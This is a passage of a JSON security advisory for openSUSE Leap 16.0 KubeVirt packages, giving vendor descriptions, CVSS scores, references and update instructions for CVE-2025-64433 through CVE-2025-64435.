"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
